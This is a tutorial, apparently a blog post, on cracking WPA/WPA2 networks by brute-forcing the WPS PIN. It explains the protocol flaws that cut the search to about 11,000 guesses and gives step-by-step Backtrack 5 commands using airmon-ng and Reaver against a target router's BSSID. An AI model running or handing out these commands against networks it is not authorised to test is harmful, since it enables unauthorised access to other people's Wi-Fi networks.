Cracking WPA/WPA2 By brute forcing Wi-fi Protected Setup

For legal purposes, please don’t try this on any equipment that you don’t own. Intro Wi-fi Protected Setup more commonly known as WPS is an optional configuration tool introduced in many Small office and Home Office (SOHO) Wireless routers starting in early 2007. This Wi-Fi alliance certification program was designed to ease the task of SOHO wireless configuration by providing an industry wide network setup solution. Now a day most major vendors of the SOHO class of Wi-Fi routers ship there product with WPS support and is activated by default. Today we will be taking a look at 2 flaws in the WPS design that can be exploited in order to brute force the WPS PIN. I will do a brief overview of these 2 flaws then follow up by providing instruction on how to work through exploiting WPS on a SOHO router using Backtrack 5 R3 and a tool called Reaver. The Flaws The flaws we will be looking at have to do with WPS’s support for in-band configuration over IEEE 802.11/EAP specifically with the External registrar process. This is the process used by a WLAN host to associate with a WAP by using the devices WPS PIN. That being said the first flaw with this external registrar option is that it does not require any authentication from the WLAN host to associate with the WAP leaving the PIN vulnerable to Brute force type attacks. The second Flaw has to do with the way the WPS authentication process is implemented with 802.11/EAP. This process uses a challenge response methodology and if at any point in the process you fail to correctly respond to the challenge you receive a EAP-NACK Message. This process also splits the key into 2 parts as shown below |1|2|3|4|5|6|7|0| 1st half| 2nd half & of PIN | Checksum So by knowing what at what step we are in the process when we receive the EAP-NACK we reduce the number of possibilities from 10^8 down to 10^4 +10^4 or 100,000,000 to 20,000 but since we know the 8th digit is a checksum of the pin we are really looking at 10^4 + 10^3 or 11,000 total testable combinations to solve for the completed WPS PIN. So with a tool like reaver testing 4 Pin’s every 3 seconds we can get through all possible combinations in approximately 4 hours. Using Reaver with Backtrack 5 R3 What you will need: A copy of Backtrack 5, and an external WLAN adapter ( I use the Alfa networks AWUS036H ) You will also need to know the BSSID (MAC Address ) of the Router you plan to attack. for this you can use something like airodump-ng to analyze all the AP’s in the area. So lets get to the fun stuff. 1. Load up your Backtrack 5 instance 2. Open up terminal and run the following commands a. CODE : Sudo apt-get update b. CODE : Sudo apt-get install reaver 3. Make sure your Wi-fi adapter is connected and then place it into monitor mode a. CODE : Airmon-ng start wlan0 4. Next run the following command to invoke reaver a. CODE : Reaver –I mon0 –b <BSSID of target> -VV Note: you can use CTRL+C to pause and save the attack progress to continue at a later time